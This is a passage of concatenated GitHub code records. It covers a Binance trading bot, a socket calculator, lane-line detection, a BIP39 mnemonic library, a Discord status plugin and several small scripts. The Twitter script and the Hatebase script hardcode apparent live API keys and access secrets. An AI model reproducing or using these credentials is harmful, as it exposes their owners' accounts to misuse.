base: str, quote: str, type: str, side: str, amount: float, stop_price: float, profit_price: float):\n symbol = self.parse_symbol(base, quote)\n inverted_side = 'sell' if side.lower() == 'buy' else 'buy' # buy면 sell, sell이면 buy * 진입 포지션과 반대로 주문 넣어줘 야함\n self.future.create_order(symbol, \"STOP_MARKET\", inverted_side, amount, None, {\"stopPrice\": stop_price, \"newClientOrderId\": \"STOP_MARKET\"}) # STOP LOSS 오더\n 
self.future.create_order(symbol, \"TAKE_PROFIT_MARKET\", inverted_side, amount, None, {\"stopPrice\": profit_price, \"newClientOrderId\": \"TAKE_PROFIT_MARKET\"}) # TAKE profit 오더\n\n # response = self.future.private_post_order_oco({\n # 'symbol': self.future.market(symbol)['id'],\n # 'side': 'BUY', # SELL, BUY\n # 'quantity': self.future.amount_to_precision(symbol, amount),\n # 'price': self.future.price_to_precision(symbol, profit_price),\n # 'stopPrice': self.future.price_to_precision(symbol, stop_price),\n # # 'stopLimitPrice': self.future.price_to_precision(symbol, stop_limit_price), # If provided, stopLimitTimeInForce is required\n # # 'stopLimitTimeInForce': 'GTC', # GTC, FOK, IOC\n # # 'listClientOrderId': exchange.uuid(), # A unique Id for the entire orderList\n # # 'limitClientOrderId': exchange.uuid(), # A unique Id for the limit order\n # # 'limitIcebergQty': exchangea.amount_to_precision(symbol, limit_iceberg_quantity),\n # # 'stopClientOrderId': exchange.uuid() # A unique Id for the stop loss/stop loss limit leg\n # # 'stopIcebergQty': exchange.amount_to_precision(symbol, stop_iceberg_quantity),\n # # 'newOrderRespType': 'ACK', # ACK, RESULT, FULL\n # })\n\n async def market_entry_async(self, base: str, quote: str, type: str, side: str, amount: float, price: str = None, entry_percent: float = None, leverage: int = None):\n symbol = self.parse_symbol(base, quote)\n side = self.parse_side(side)\n quote = self.parse_quote(quote)\n entry_amount = self.get_amount(base, quote, amount, entry_percent)\n if leverage is not None:\n self.set_leverage(leverage, symbol)\n return await self.future_async.create_order(symbol, type.lower(), side, abs(entry_amount))\n\n def market_close(self, base: str, quote: str, type: str, side: str, amount: float = None, price: str = None, close_percent: str = None):\n symbol = self.parse_symbol(base, quote)\n side = self.parse_side(side)\n quote = self.parse_quote(quote)\n close_amount = self.get_amount(base, quote, amount, close_percent)\n try:\n return self.future.create_order(symbol, type.lower(), side, close_amount, params={\"reduceOnly\": True})\n except Exception as e:\n if \"position side does not match\" in str(e):\n if side == \"buy\":\n positionSide = \"SHORT\"\n elif side == \"sell\":\n positionSide = \"LONG\"\n return self.future.create_order(symbol, type.lower(), side, close_amount, params={'positionSide': positionSide})\n else:\n raise Exception(\"종료 실패\")\n\n \n def market_long_close(self, base: str, quote: str, amount: float = None, price: str = None, close_percent: str = None):\n return self.market_close(base, quote, \"market\", \"close/sell\", amount, price, close_percent)\n\n def market_short_close(self, base: str, quote: str, amount: float = None, price: str = None, close_percent: str = None):\n return self.market_close(base, quote, \"market\", \"close/buy\", amount, price, close_percent)\n\n async def market_close_async(self, base: str, quote: str, type: str, side: str, amount: float = None, price: str = None, close_percent: str = None):\n symbol = self.parse_symbol(base, quote)\n side = self.parse_side(side)\n quote = self.parse_quote(quote)\n close_amount = self.get_amount(base, quote, amount, close_percent)\n return await self.future_async.create_order(symbol, type.lower(), side, close_amount, params={\"reduceOnly\": True})\n\n def set_leverage(self, leverage, symbol):\n self.future.set_leverage(leverage, symbol)\n\n def fetch_ticker(self, base: str, quote: str):\n symbol = self.parse_symbol(base, quote)\n if 
self.order_info.is_futures:\n return self.future.fetch_ticker(symbol)\n else:\n return self.spot.fetch_ticker(symbol)\n\n def fetch_price(self, base: str, quote: str):\n return self.fetch_ticker(base, quote)[\"last\"]\n\n def get_balance(self, base: str):\n balance = self.future.fetch_free_balance().get(base) if self.order_info.is_crypto and self.order_info.is_futures else self.spot.fetch_free_balance().get(base)\n if balance is None or balance == 0:\n raise Exception(\"거래할 수량이 없습니다\")\n return balance\n\n def get_futures_position(self, symbol):\n position = self.future.fetch_positions_risk(symbols=[symbol])\n if position:\n balance = position[0].get(\"contracts\")\n if balance is None or balance == 0:\n raise Exception(\"거래할 수량이 없습니다\")\n return balance\n else:\n raise Exception(\"거래할 수량이 없습니다\")\n\n def get_listen_key(self):\n url = 'https://fapi.binance.com/fapi/v1/listenKey'\n\n listenkey = httpx.post(url, headers={'X-MBX-APIKEY': self.future.apiKey}).json()[\"listenKey\"]\n return listenkey\n","repo_name":"jangdokang/poabot","sub_path":"exchange/binance.py","file_name":"binance.py","file_ext":"py","file_size_in_byte":12099,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"94"} +{"seq_id":"10312440330","text":"from socket import *\n\nserver = socket(AF_INET, SOCK_STREAM)\nserver.bind(('',9999))\nserver.listen(5)\nprint(\"waiting .... \")\n\n# 여기다가 accept하면 에러가 안남\nclient, addr = server.accept()\nprint(\"Connect from :\", addr)\n\nwhile True:\n msg = client.recv(1024)\n if not msg :\n break\n\n message = msg.decode()\n\n msg = message.split(\" \")\n fi = int(msg[0])\n cal = msg[1]\n se = int(msg[2])\n if cal == \"+\":\n client.send(str((lambda x, y : x+y)(fi,se)).encode())\n elif cal == \"-\":\n client.send(str((lambda x, y : x-y)(fi,se)).encode())\n elif cal == \"*\":\n client.send(str((lambda x, y : x*y)(fi,se)).encode())\n elif cal == \"/\":\n client.send(str('%.1f' %(lambda x,y : x/y)(fi,se)).encode())\n\nclient.close()","repo_name":"jjimini98/Network-Programming","sub_path":"Homework_Review/hw5/hw5_server.py","file_name":"hw5_server.py","file_ext":"py","file_size_in_byte":771,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"26528457089","text":"#! 
/bin/env python\r\n#\r\n# Michael Gibson 27 April 2015\r\n\r\ndef data_to_result(header, data, data_present):\r\n \"\"\"Moves the header and data (if present) into a common object.\"\"\"\r\n\r\n result = {}\r\n result['notes'] = header['notes']\r\n result['frequency_parameters'] = header['frequency_parameters']\r\n\r\n if header['num_amplifier_channels'] > 0:\r\n result['amplifier_channels'] = header['amplifier_channels']\r\n if data_present:\r\n result['amplifier_data'] = data['amplifier_data']\r\n result['stim_data'] = data['stim_data']\r\n result['t_amplifier'] = data['t_amplifier']\r\n result['spike_triggers'] = header['spike_triggers']\r\n if header['dc_amplifier_data_saved']:\r\n result['dc_amplifier_data'] = data['dc_amplifier_data']\r\n\r\n if header['num_board_adc_channels'] > 0:\r\n result['board_adc_channels'] = header['board_adc_channels']\r\n if data_present:\r\n result['board_adc_data'] = data['board_adc_data']\r\n result['t_board_adc'] = data['t_board_adc']\r\n\r\n if header['num_board_dac_channels'] > 0:\r\n result['board_dac_channels'] = header['board_dac_channels']\r\n if data_present:\r\n result['board_adc_data'] = data['board_adc_data']\r\n result['t_board_dac'] = data['t_board_dac']\r\n\r\n if header['num_board_dig_in_channels'] > 0:\r\n result['board_dig_in_channels'] = header['board_dig_in_channels']\r\n if data_present:\r\n result['board_dig_in_data'] = data['board_dig_in_data']\r\n result['t_dig'] = data['t_dig']\r\n\r\n if header['num_board_dig_out_channels'] > 0:\r\n result['board_dig_out_channels'] = header['board_dig_out_channels']\r\n if data_present:\r\n result['board_dig_out_data'] = data['board_dig_out_data']\r\n result['t_dig'] = data['t_dig']\r\n\r\n return result\r\n","repo_name":"zekearneodo/swissknife","sub_path":"swissknife/bci/core/intan_rhs/util/data_to_result.py","file_name":"data_to_result.py","file_ext":"py","file_size_in_byte":1894,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"94"} +{"seq_id":"71101936311","text":"#Jules Henry, Ahmir Ghorbanian\n#Spring 2020\n\n#Script to test functions of other scripts\n\n#NOT TO BE USED WITH ANY OTHER FILE FROM PROJECT\n\nimport filter_by_handle\nimport tweepy\n\nCONSUMER_KEY = 'LMxsDbA4lx7RqWhf2DqGeM1yx'\nCONSUMER_SECRET = 'azc96uPycF05zlIslDudv6YaWM40OIWhOd22VBBFVsUVjtdwdp'\nACCESS_KEY = '228978699-mFQ0w0U3rEvohSQnuADEOfgu3rqQSIIVEeMMQrbU'\nACCESS_SECRET = 'cikbqBaSgseWCHIJm3NRXx3WRDgO9zRLkEiSoQest0T7i'\n\n\nauth = tweepy.OAuthHandler(CONSUMER_KEY, CONSUMER_SECRET)\nauth.set_access_token(ACCESS_KEY, ACCESS_SECRET)\napi = tweepy.API(auth, wait_on_rate_limit = True)\n\n\nnamelist = filter_by_handle.get_info_minute()\n\nprint(len(namelist).__str__() + \" accounts\")\n\nfor x in namelist:\n try:\n user = api.get_user(x)\n screen_name = user.screen_name\n verified = user.verified.__str__()\n protect = user.protected.__str__()\n num_tweets = user.statuses_count.__str__()\n bio = user.description.__str__()\n link = user.url.__str__()\n following = user.friends_count.__str__()\n followers = user.followers_count.__str__()\n id = user.id.__str__()\n favorites = user.favourites_count.__str__()\n print(\"screen name: @\" + screen_name)\n print(\"verified: \" + verified)\n #print(\"private: \" + protect)\n print(\"number of tweets: \" + num_tweets)\n #print(\"link in bio: \" + bio)\n print(\"following: \" + following)\n print(\"followers: \" + followers)\n print(\"favorites: \" + favorites)\n print(\" \")\n print(\"-----------\")\n print(\" \")\n\n except:\n print(\"user 
couldnt be fetched\")\n print(\" \")\n print(\"-----------\")\n print(\" \")\n\n\n\n\n\n","repo_name":"jululules/4823","sub_path":"newsfilter/cred_validity.py","file_name":"cred_validity.py","file_ext":"py","file_size_in_byte":1699,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"19777910109","text":"from rest_framework import serializers\n\nfrom ..messages import (\n INVALID_TIME_MESSAGE,\n no_class_found,\n timetable_clash_message,\n)\nfrom ..models import Classes, TimeTable\nfrom .classes_serializer import ListAllClassesSerializer\n\n\nclass TimeTableSerializer(serializers.ModelSerializer):\n _class_ = serializers.UUIDField()\n\n class Meta:\n model = TimeTable\n exclude = [\"_class\"]\n\n def validate(self, data):\n days = data.get(\"days\")\n start_time = data.get(\"start_time\")\n end_time = data.get(\"end_time\")\n room_no = data.get(\"room_no\")\n _class = data.get(\"_class_\")\n is_class_exists = Classes.objects.filter(id=_class).exists()\n\n if not is_class_exists:\n raise serializers.ValidationError(no_class_found(_class))\n\n if start_time > end_time:\n raise serializers.ValidationError(INVALID_TIME_MESSAGE)\n\n if TimeTable.objects.filter(\n start_time__lt=end_time,\n end_time__gt=start_time,\n room_no=room_no,\n days=days,\n ).exists():\n\n raise serializers.ValidationError(timetable_clash_message(room_no))\n\n timetable: TimeTable = TimeTable.objects.create(\n days=days,\n start_time=start_time,\n end_time=end_time,\n room_no=room_no,\n _class=Classes.objects.get(id=_class),\n )\n\n timetable.save()\n\n return data\n\n\nclass PureTimeTableSerializer(serializers.ModelSerializer):\n _class = ListAllClassesSerializer(read_only=True)\n\n class Meta:\n model = TimeTable\n exclude = [\"id\"]\n","repo_name":"AhzamAhmed6/online_school","sub_path":"src/classes/serializer/timetable_serializer.py","file_name":"timetable_serializer.py","file_ext":"py","file_size_in_byte":1637,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"42737140730","text":"import json\nimport requests\nfrom hatebase import HatebaseAPI\n\n\nkey = \"TuwmngrrxcytZkgqyfvtpdUb4yjsKsru\"\n\nhatebase = HatebaseAPI({\"key\": key})\nfilters = {'is_about_nationality': \"false\", 'is_about_ethnicity':\"false\",'is_about_religion':\"false\",'is_about_gender':\"false\",'is_about_sexual_orientation':\"false\",'is_about_disability':\"false\",'is_about_class':\"true\", 'language': 'ENG', 'country': 'US', 'year': \"2015\"}\nformat = \"json\"\njson_response = hatebase.getSightings(filters=filters, format=format)\n\nwith open('classOnly2015.txt', 'w+') as outfile:\n \toutfile.write(json.dumps(json_response, indent=4))\n","repo_name":"chingyuany/Twitter-hatespeech-detection","sub_path":"HateBaseAPICode/hateBaseAPI.py","file_name":"hateBaseAPI.py","file_ext":"py","file_size_in_byte":605,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"94"} +{"seq_id":"40859222268","text":"#You are given a string and your task is to swap cases.\n# In other words, convert all lowercase letters to uppercase letters and vice versa.\n#For Example:\n#Www.HackerRank.com → wWW.hACKERrANK.COM\n#Pythonist 2 → pYTHONIST 2\n\n\ns = input()\nnew_string = \"\"\nfor i in range(len(s)):\n if s[i].isupper():\n new_string += s[i].lower()\n else:\n new_string += s[i].upper()\nprint(new_string)","repo_name":"Rashid786-nadaf/100-days-of-code","sub_path":"swap case.py","file_name":"swap 
case.py","file_ext":"py","file_size_in_byte":401,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"94"} +{"seq_id":"72531862388","text":"# 10-8. Cats and Dogs: Make two files, cats.txt and dogs.txt. Store at\n# least three names of cats in the first file and three names of dogs\n# in the second file. Write a program that tries to read these files\n# and print the contents of the file to the screen. Wrap your code in\n# a try-except block to catch the FileNotFound error, and print a\n# friendly message if a file is missing. Move one of the files to a\n# different location on your system, and make sure the code in the\n# except block executes properly.\n\nprint(\"\\nEx 10.8 Cats and Dogs\\n\" + \"-\"*70)\n\ndef read_txt(filename):\n try:\n with open(filename, encoding='utf-8') as file_object:\n lines = file_object.readlines()\n except FileNotFoundError:\n print(f\"\\n{filename} does not exist.\")\n else:\n print(f\"\\n{filename}:\")\n for line in lines:\n print(f\"- {line.title().rstrip()}\")\n\nfilenames = ['cats.txt', 'dogs.txt', 'cat.txt', 'dog.txt']\nfor filename in filenames:\n read_txt(filename)","repo_name":"TrongPhamDA/Python-Crash-Course-2nd-edition","sub_path":"chapter_10/tryityourself108.py","file_name":"tryityourself108.py","file_ext":"py","file_size_in_byte":1003,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"94"} +{"seq_id":"7555688028","text":"import matplotlib.pyplot as plt\nimport matplotlib.image as mpimg\nimport numpy as np\nimport cv2 as cv\nimport math\n\nline_collection = []\n\n\n#take the original frame and convert it to greyscale\ndef apply_greyscale(image):\n return cv.cvtColor(image, cv.COLOR_RGB2GRAY)\n\n#apply a Gaussian Blur to the greyed image\ndef add_blur(grey):\n kernel_size = 5\n return cv.GaussianBlur(grey,(kernel_size, kernel_size), 0)\n\n#Implemented the canny algorithim on the Blurred photo\ndef apply_canny(grey):\n blur_grey = add_blur(grey)\n\n #declare the low and high thresholds. 
The Canny algorithim will identify edges where the gradient is near the midpoint of those\n # two values\n low_threshold = 60\n high_threshold = 100\n return cv.Canny(blur_grey, low_threshold, high_threshold)\n\n#add a mask to try to eliminate the amount of edges that are displayed in the final photo\ndef add_mask(image, edges):\n mask = np.zeros_like(edges)\n ignore_mask_color = 255\n\n imshape = image.shape\n\n\n vertices = np.array([[(0, imshape[0]),(450, 290), (490, 290), (imshape[1],imshape[0])]], dtype=np.int32)\n cv.fillPoly(mask, vertices, ignore_mask_color)\n return cv.bitwise_and(edges, mask)\n\n#check if a point is within the valid area (within the region of interest)\ndef valid_point(x, y, left, right, top, bottom):\n if(x >= left and x <= right):\n if(y >= bottom and y <= top):\n return True\n return False\n\n#compare the lines on the edge of the region of interest to the lane lines (or any edges found)\ndef compare_lines(x1, y1, x2, y2, start, end, is_left):\n compared_slope = ((end[1] - start[1])/(end[0]- start[0]))\n drawn_slope = ((y2-y1)/(x2-x1))\n\n #left side\n if(is_left):\n #compare to the left side of the region of interest\n if(valid_point(x1, y1, start[0], end[0], end[1], start[1]) and valid_point(x2, y2, start[0], end[0], end[1], start[1]) ):\n #return whether the slope of the edge is less than the slope of the left edge of the region of interest\n return (compared_slope > drawn_slope)\n elif(not is_left):\n #not left side so flip the slope\n compared_slope = -compared_slope\n drawn_slope = -drawn_slope\n if(valid_point(x1, y1, end[0], start[0], start[1], end[1]) and valid_point(x2, y2, end[0], start[0], start[1], end[1])):\n return (compared_slope > drawn_slope)\n\n return (compared_slope > drawn_slope)\n\n#draw the lines on the image\ndef drawLines(image):\n #create a greyscaled image\n grey = apply_greyscale(image)\n #apply the canny algorithim to the grey photo\n edges = apply_canny(grey)\n\n # add the mask to the image\n mask = add_mask(image, edges)\n\n #declare the parameters for the HoughLines function\n rho = 1\n theta = np.pi/180\n threshold = 1\n min_line_length = 10\n max_line_gap = 1\n line_image = np.copy(image)*0\n\n lines = cv.HoughLinesP(mask, rho, theta, threshold, np.array([]), min_line_length, max_line_gap)\n\n #define the edges of the rgion of interest\n left_bottom = (135, 539)\n right_bottom = (940,539)\n apex = (489, 300)\n\n for line in lines:\n for x1,y1,x2,y2 in line:\n #to the left of the apex (compute the values accordingly)\n if(x1 < apex[0] and x2 <= apex[0]):\n if(compare_lines(x1, y1, x2, y2, left_bottom, apex, True)):\n #valid points draw the line\n line_collection.append([x1, y1, x2, y2, (y2-y1/x2-x1), math.sqrt((x2-x1)**2 + (y2-y1)**2)])\n cv.line(line_image,(x1,y1),(x2,y2),(255,0,0),10)\n elif(x1 > apex[0] and x2 >= apex[0]):\n if(compare_lines(x1, y1, x2, y2, right_bottom, apex, False)):\n line_collection.append([x1, y1, x2, y2, (y2-y1/x2-x1), math.sqrt((x2-x1)**2 + (y2-y1)**2)])\n cv.line(line_image,(x1,y1),(x2,y2),(255,0,0),10)\n\n color_edges = np.dstack((edges, edges, edges))\n\n for drawn in line_collection:\n print(drawn, \"\\n\")\n\n #return the completed images\n return cv.addWeighted(image, 0.8, line_image, 1, 0)","repo_name":"GiffinOsborne/OpenCV_Lane_Lines_V1","sub_path":"Finding_Lane_Lines_OOP_Version_1/houghLines.py","file_name":"houghLines.py","file_ext":"py","file_size_in_byte":4126,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} 
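Note on the preceding record (houghLines.py): it builds its lane detector from a grayscale + Gaussian blur + Canny + region-of-interest mask + probabilistic Hough pipeline. A minimal, self-contained sketch of that pipeline follows; the input path "road.jpg", the ROI fractions, and the threshold values are illustrative assumptions, not the record's exact settings.

import numpy as np
import cv2 as cv

def detect_line_segments(image_path="road.jpg"):
    """Return Hough line segments from a road image (sketch of the pipeline above)."""
    image = cv.imread(image_path)                      # hypothetical input file
    gray = cv.cvtColor(image, cv.COLOR_BGR2GRAY)       # 0. grayscale
    blurred = cv.GaussianBlur(gray, (5, 5), 0)         # 1. suppress noise before edge detection
    edges = cv.Canny(blurred, 60, 100)                 # 2. low/high gradient thresholds

    # 3. keep only a trapezoidal region of interest, as the record does with fillPoly
    mask = np.zeros_like(edges)
    h, w = edges.shape
    roi = np.array([[(0, h), (int(0.45 * w), int(0.55 * h)),
                     (int(0.55 * w), int(0.55 * h)), (w, h)]], dtype=np.int32)
    cv.fillPoly(mask, roi, 255)
    masked = cv.bitwise_and(edges, mask)

    # 4. probabilistic Hough transform: each returned row is one (x1, y1, x2, y2) segment
    lines = cv.HoughLinesP(masked, rho=1, theta=np.pi / 180, threshold=1,
                           minLineLength=10, maxLineGap=1)
    return [] if lines is None else [tuple(seg[0]) for seg in lines]

In the record itself the returned segments are additionally filtered by comparing their slopes against the left and right edges of the region of interest (compare_lines) before being drawn and blended back onto the frame with cv.addWeighted.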
+{"seq_id":"41231749559","text":"import binascii\nimport bisect\nimport hashlib\nimport hmac\nimport itertools\nimport os\nimport sys\nimport unicodedata\n#from pbkdf2 import PBKDF2\n\nPBKDF2_ROUNDS = 2048\n\n\nclass ConfigurationError(Exception):\n pass\n\n\n# From \ndef binary_search(a, x, lo=0, hi=None): # can't use a to specify default for hi\n hi = hi if hi is not None else len(a) # hi defaults to len(a)\n pos = bisect.bisect_left(a, x, lo, hi) # find insertion position\n return (pos if pos != hi and a[pos] == x else -1) # don't walk off the end\n\n\nclass Mnemonic(object):\n def __init__(self, language):\n self.radix = 2048\n with open('%s/%s.txt' % (self._get_directory(), language), 'r') as f:\n self.wordlist = [w.strip().decode('utf8') if sys.version < '3' else w.strip() for w in f.readlines()]\n if len(self.wordlist) != self.radix:\n raise ConfigurationError('Wordlist should contain %d words, but it contains %d words.' % (self.radix, len(self.wordlist)))\n\n @classmethod\n def _get_directory(cls):\n return os.path.join(os.path.dirname(__file__), 'wordlist')\n\n @classmethod\n def list_languages(cls):\n return [f.split('.')[0] for f in os.listdir(cls._get_directory()) if f.endswith('.txt')]\n\n @classmethod\n def normalize_string(cls, txt):\n if isinstance(txt, str if sys.version < '3' else bytes):\n utxt = txt.decode('utf8')\n elif isinstance(txt, unicode if sys.version < '3' else str): # noqa: F821\n utxt = txt\n else:\n raise TypeError(\"String value expected\")\n\n return unicodedata.normalize('NFKD', utxt)\n\n @classmethod\n def detect_language(cls, code):\n code = cls.normalize_string(code)\n first = code.split(' ')[0]\n languages = cls.list_languages()\n\n for lang in languages:\n mnemo = cls(lang)\n if first in mnemo.wordlist:\n return lang\n\n raise ConfigurationError(\"Language not detected\")\n\n def generate(self, strength=128):\n if strength not in [128, 160, 192, 224, 256]:\n raise ValueError('Strength should be one of the following [128, 160, 192, 224, 256], but it is not (%d).' % strength)\n return self.to_mnemonic(os.urandom(strength // 8))\n\n # Adapted from \n def to_entropy(self, words):\n if not isinstance(words, list):\n words = words.split(' ')\n if len(words) not in [12, 15, 18, 21, 24]:\n raise ValueError('Number of words must be one of the following: [12, 15, 18, 21, 24], but it is not (%d).' % len(words))\n # Look up all the words in the list and construct the\n # concatenation of the original entropy and the checksum.\n concatLenBits = len(words) * 11\n concatBits = [False] * concatLenBits\n wordindex = 0\n if self.detect_language(' '.join(words)) == 'english':\n use_binary_search = True\n else:\n use_binary_search = False\n for word in words:\n # Find the words index in the wordlist\n ndx = binary_search(self.wordlist, word) if use_binary_search else self.wordlist.index(word)\n if ndx < 0:\n raise LookupError('Unable to find \"%s\" in word list.' 
% word)\n # Set the next 11 bits to the value of the index.\n for ii in range(11):\n concatBits[(wordindex * 11) + ii] = (ndx & (1 << (10 - ii))) != 0\n wordindex += 1\n checksumLengthBits = concatLenBits // 33\n entropyLengthBits = concatLenBits - checksumLengthBits\n # Extract original entropy as bytes.\n entropy = bytearray(entropyLengthBits // 8)\n for ii in range(len(entropy)):\n for jj in range(8):\n if concatBits[(ii * 8) + jj]:\n entropy[ii] |= 1 << (7 - jj)\n # Take the digest of the entropy.\n hashBytes = hashlib.sha256(entropy).digest()\n if sys.version < '3':\n hashBits = list(itertools.chain.from_iterable(([ord(c) & (1 << (7 - i)) != 0 for i in range(8)] for c in hashBytes)))\n else:\n hashBits = list(itertools.chain.from_iterable(([c & (1 << (7 - i)) != 0 for i in range(8)] for c in hashBytes)))\n # Check all the checksum bits.\n for i in range(checksumLengthBits):\n if concatBits[entropyLengthBits + i] != hashBits[i]:\n raise ValueError('Failed checksum.')\n return entropy\n\n def to_mnemonic(self, data):\n if len(data) not in [16, 20, 24, 28, 32]:\n raise ValueError('Data length should be one of the following: [16, 20, 24, 28, 32], but it is not (%d).' % len(data))\n h = hashlib.sha256(data).hexdigest()\n b = bin(int(binascii.hexlify(data), 16))[2:].zfill(len(data) * 8) + \\\n bin(int(h, 16))[2:].zfill(256)[:len(data) * 8 // 32]\n result = []\n for i in range(len(b) // 11):\n idx = int(b[i * 11:(i + 1) * 11], 2)\n result.append(self.wordlist[idx])\n if self.detect_language(' '.join(result)) == 'japanese': # Japanese must be joined by ideographic space.\n result_phrase = u'\\u3000'.join(result)\n else:\n result_phrase = ' '.join(result)\n return result_phrase\n\n def check(self, mnemonic):\n mnemonic = self.normalize_string(mnemonic).split(' ')\n # list of valid mnemonic lengths\n if len(mnemonic) not in [12, 15, 18, 21, 24]:\n return False\n try:\n idx = map(lambda x: bin(self.wordlist.index(x))[2:].zfill(11), mnemonic)\n b = ''.join(idx)\n except ValueError:\n return False\n l = len(b) # noqa: E741\n d = b[:l // 33 * 32]\n h = b[-l // 33:]\n nd = binascii.unhexlify(hex(int(d, 2))[2:].rstrip('L').zfill(l // 33 * 8))\n nh = bin(int(hashlib.sha256(nd).hexdigest(), 16))[2:].zfill(256)[:l // 33]\n return h == nh\n\n def expand_word(self, prefix):\n if prefix in self.wordlist:\n return prefix\n else:\n matches = [word for word in self.wordlist if word.startswith(prefix)]\n if len(matches) == 1: # matched exactly one word in the wordlist\n return matches[0]\n else:\n # exact match not found.\n # this is not a validation routine, just return the input\n return prefix\n\n def expand(self, mnemonic):\n return ' '.join(map(self.expand_word, mnemonic.split(' ')))\n\n #@classmethod\n #def to_seed(cls, mnemonic, passphrase=''):\n #mnemonic = cls.normalize_string(mnemonic)\n #passphrase = cls.normalize_string(passphrase)\n #return PBKDF2(mnemonic, u'mnemonic' + passphrase, iterations=PBKDF2_ROUNDS, macmodule=hmac, digestmodule=hashlib.sha512).read(64)\n\n\ndef main():\n import binascii\n import sys\n if len(sys.argv) > 1:\n data = sys.argv[1]\n else:\n data = sys.stdin.readline().strip()\n data = binascii.unhexlify(data)\n m = Mnemonic('english')\n print(m.to_mnemonic(data))\n\n\nif __name__ == '__main__':\n main()\n 
\n","repo_name":"snopf/snopf","sub_path":"src/host/pc/bip39_mnemonic_reference_trezor.py","file_name":"bip39_mnemonic_reference_trezor.py","file_ext":"py","file_size_in_byte":7189,"program_lang":"python","lang":"en","doc_type":"code","stars":134,"dataset":"github-code","pt":"94"} +{"seq_id":"70746831671","text":"import os\r\n\r\nfrom flask import Flask, make_response, jsonify, request\r\nfrom flask import g\r\nfrom dal.db import Db\r\nfrom transaction.process_transaction import Process_Transaction\r\nfrom exception.app_exception import AppException, ClientException, ServerException\r\n\r\nimport config\r\n\r\nprocess_transaction = Process_Transaction()\r\napp = Flask(__name__)\r\napp.config.from_object(config.Config)\r\n\r\n\r\n@app.errorhandler(AppException)\r\ndef app_error(err):\r\n app.logger.exception(err)\r\n return make_response(jsonify(err.error), err.http_code)\r\n\r\n@app.errorhandler(Exception)\r\ndef handle_generic_error(err):\r\n app.logger.exception(err)\r\n return make_response(jsonify(str(err)), 500)\r\n\r\n@app.route('/process_payment', methods=['POST'])\r\ndef process_payment():\r\n data = request.get_json()\r\n result, code = process_transaction.initialize_payment(data)\r\n return make_response(jsonify(result),code)\r\n\r\ndef init_app(flask_app):\r\n flask_app.config.from_object(config.DEVConfig)\r\n db_instance = Db(flask_app)\r\n print('DB Connection: ' + str(db_instance))\r\n\r\n\r\nif __name__ == '__main__':\r\n init_app(app)\r\n app.run(host='127.0.0.1', port='5000')\r\n","repo_name":"harshilpatel99/Filed_PythonCodingTest","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1162,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"2794638063","text":"from typing import List\nfrom collections import Counter\n\n\nclass Solution:\n def countNegatives(self, grid: List[List[int]]) -> int:\n count = 0\n for i in grid:\n c = Counter(i)\n for j, k in c.items():\n if j < 0:\n count += k\n\n return count\n","repo_name":"rich-03/LeetPractice","sub_path":"Problem1351/Problem1351.py","file_name":"Problem1351.py","file_ext":"py","file_size_in_byte":316,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"5556297055","text":"import time\r\nimport os\r\nimport json\r\nimport gi\r\ngi.require_version('Notify', '0.7')\r\nfrom gi.repository import Notify, GObject, Peas, RB\r\nfrom pypresence import Presence\r\nfrom status_prefs import discord_status_prefs\r\n\r\nDEFAULT_APPID = \"589905203533185064\"\r\n\r\nclass DiscordStatus(GObject.Object, Peas.Activatable):\r\n object = GObject.property(type=GObject.Object)\r\n\r\n def __init__(self):\r\n super(DiscordStatus, self).__init__()\r\n\r\n print(f\"discord_status: GOBJECT SELF OBJECT: {self.object}\")\r\n\r\n settings_path = os.path.join(os.path.dirname(os.path.realpath(__file__)), \"settings.json\")\r\n \r\n with open(settings_path) as settings_file:\r\n self.settings = json.load(settings_file)\r\n \r\n self.notify_available = False\r\n self.connected = False\r\n self.streaming = False\r\n self.stream_flag = False\r\n self.playing = False\r\n self.song_started_at = 0\r\n self.playing_date = 0\r\n self.elapsed_time = 0\r\n\r\n def send_notification(self, message):\r\n if self.notify_available and self.settings[\"show_notifs\"]:\r\n Notify.Notification.new(\"Rhythmbox Discord Status Plugin\", message).show()\r\n\r\n \r\n def do_activate(self):\r\n self.notify_available = 
Notify.init(\"rhythmbox_discord_status\")\r\n\r\n try:\r\n self.rpc = Presence(self.settings[\"appid\"] if \"appid\" in self.settings else DEFAULT_APPID)\r\n self.rpc.connect()\r\n self.connected = True\r\n self.send_notification(\"Connected to Discord\")\r\n except ConnectionRefusedError as err:\r\n print(\"discord_status: failed to connect to discord:\", err)\r\n self.send_notification(f\"Failed to connect to discord: {err}\\nRe-enable the plugin to retry\")\r\n return\r\n\r\n sp = self.object.props.shell_player\r\n self.playing_song_changed_id = sp.connect('playing-song-changed', self.on_playing_song_changed)\r\n self.playing_state_changed_id = sp.connect('playing-changed', self.on_playing_state_changed)\r\n self.elapsed_changed_id = sp.connect('elapsed-changed', self.on_elapsed_changed)\r\n self.playing_changed_id = sp.connect('playing-song-property-changed', self.on_playing_song_property_changed)\r\n \r\n self.rpc.update(state=\"Playback Stopped\", details=\"Rhythmbox Status Plugin\", large_image=\"rhythmbox\", small_image=\"stop\", small_text=\"Stopped\")\r\n\r\n def do_deactivate(self):\r\n sp = self.object.props.shell_player\r\n sp.disconnect(self.playing_song_changed_id)\r\n sp.disconnect(self.playing_state_changed_id)\r\n sp.disconnect(self.elapsed_changed_id)\r\n sp.disconnect(self.playing_changed_id)\r\n\r\n if self.connected:\r\n self.rpc.close()\r\n\r\n if self.notify_available:\r\n Notify.uninit()\r\n\r\n def get_current_song_info(self, sp):\r\n playing_entry = sp.get_playing_entry()\r\n if not playing_entry:\r\n return {\r\n \"album\": \"Unknown\",\r\n \"title\": \"Unknown\",\r\n \"artist\": 